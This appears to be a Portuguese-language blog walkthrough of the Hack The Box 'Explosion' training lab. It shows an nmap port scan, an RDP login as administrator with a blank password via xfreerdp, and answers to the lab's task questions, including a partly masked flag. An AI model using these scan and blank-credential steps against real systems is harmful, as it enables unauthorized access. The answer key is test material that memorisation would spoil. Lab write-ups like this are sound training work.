Fala Rapaziada, beleza?
Hoje vou trazer a resolução do Laboratório Explosion do Starting point do HTB.
Capture to Flag
Primeiro, rodei o nmap para descobrir as portas abertas. Diversas portas estão abertas, o foco desse Lab é a porta 3389 do protocolo RDP
nmap -sSV -p- -Pn 10.129.176.127 --min-rate=1000
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-23 09:11 EST
Nmap scan report for 10.129.23.134
Host is up (0.19s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Foi possível realizar o acesso via RDP com a credencial:
Usuário: administrator
Senha: (Em branco)
xfreerdp /v:10.129.176.127 /u:administrator
Após o acesso, capturada a flag.
Tarefas
TASK 1 – What does the 3-letter acronym RDP stand for?
R: Remote Desktop Protocol
TASK 2 – What is a 3-letter acronym that refers to interaction with the host through a command line interface?
R: CLI
TASK 3 – What about graphical user interface interactions?
R: GUI
TASK 4 – What is the name of an old remote access tool that came without encryption by default and listens on TCP port 23?
R: telnet
TASK 5 – What is the name of the service running on port 3389 TCP?
R: ms-wbt-server
TASK 6 – What is the switch used to specify the target host’s IP address when using xfreerdp?
R: /v:
TASK 7 – What username successfully returns a desktop projection to us with a blank password?
R: administrator
SUBMIT FLAG – Submit root flag
R: 951fa96d7830c451XXXXXXXXXXX
Seja o primeiro a comentar